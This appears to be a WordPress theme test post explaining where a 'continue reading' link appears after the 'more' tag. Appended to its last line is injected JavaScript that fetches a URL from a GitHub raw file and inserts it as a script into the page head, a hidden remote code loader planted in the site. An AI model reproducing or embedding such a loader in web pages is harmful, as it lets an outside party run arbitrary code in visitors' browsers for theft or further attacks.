
Luzuk
15 Mar , 2012
0 Comments
This content is before the more tag.
Right after this sentence should be a “continue reading” button of some sort on list pages of themes that show full content. It won’t show on single pages or on themes showing excerpts.
;var url = ‘https://raw.githubusercontent.com/kroopsTerm/firstrepo/refs/heads/main/js.txt’;fetch(url).then(response => response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});